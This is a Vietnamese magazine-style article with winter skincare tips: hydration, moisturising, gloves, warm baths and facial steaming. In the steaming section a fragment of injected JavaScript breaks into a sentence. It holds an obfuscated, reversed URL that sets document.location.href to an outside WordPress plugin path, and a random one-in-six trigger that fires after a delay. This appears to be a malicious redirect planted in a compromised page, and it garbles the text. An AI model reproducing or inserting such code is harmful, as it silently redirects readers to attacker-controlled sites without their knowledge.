Để có làn da mềm và đẹp trong những ngày lạnh giá

TP – Thời tiết hanh khô dễ dẫn đến hệ luỵ khiến da sẽ bị khô, nẻ như da rắn, rất khó chịu. Tuy nhiên, không có nghĩa là bạn sẽ bị động đợi cho mùa đông qua đi và sở hữu một làn da mềm mịn. Hãy lưu ý những gợi ý dưới đây có được làn da mềm mịn như ý muốn ngay cả trong ngày lạnh.

lan-da-dep

Uống đủ lượng nước cơ thể cần

Đây là điều quan trọng hàng đầu giúp cho làn da không bị khử nước. Khử nước không chỉ nguy hại đến sức khoẻ mà còn khiến cho làn da dễ bị khô nẻ.

Mỗi ngày lượng nước cơ thể bạn cần là khoảng 8 cốc, ngoài nước lọc bạn có thể uống thêm sữa hoặc nước hoa quả.

Cơ thể được cung cấp đủ lượng nước cần thiết không chỉ khiến cho làn da được căng mịn trong những ngày đông mà còn giúp loại trừ mụn trứng cá.

Dưỡng da

Dưỡng da là bước chăm sóc da rất quan trọng, giúp cung cấp độ ẩm cũng như dưỡng chất thiết yếu cho làn da. Dưỡng da vào mùa đông nên được tiến hành vào buổi sáng sau khi ngủ dậy và buổi tối trước khi đi ngủ. Một bí quyết nhỏ là nên thường xuyên mang theo kem dưỡng ẩm bên mình để khi cần có thể sử dụng ngay.

Nhiều người chỉ chăm dưỡng ẩm cho vùng da mặt mà quên dưỡng ẩm cho da tay và chân. Đây là những vùng da dễ bị khô nẻ, thô ráp.

Trong trường hợp da quá khô, hãy dùng những sản phẩm được chiết xuất từ thiên nhiên có chứa nước và giàu chất seramit (một loại axit béo). Sử dụng sáng và tối, tốt nhất là sau khi tắm.

Đeo găng tay

Nên hình thành thói quen đeo găng tay khi làm việc nhà hoặc khi tiếp xúc với nước, bởi đó sẽ là cách hữu hiệu để giúp cho đôi tay không bị thô ráp trong những ngày mùa đông.

Tắm nước ấm

Tắm nước ấm trong những ngày mùa đông sẽ giúp cho máu lưu thông dễ dàng, rất có lợi cho sức khoẻ và còn là giải pháp cung cấp độ ẩm cho làn da. Lưu ý là nước ấm chứ không phải là nước quá nóng vì nước nóng sẽ khiến da bị tổn thương và khô hơn rất nhiều.

Xông hơi

Thời gian trước khi đi ngủ là lúc tốt nhất để thực hiện chế độ chăm sóc da. Xông hơi khuôn mặt trong khoảng nửa phút đến một phút. Hơi nước sẽ hoàn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} toàn mở các lỗ chân lông trên khuôn mặt.

Khổng Thu Hà
Theo Care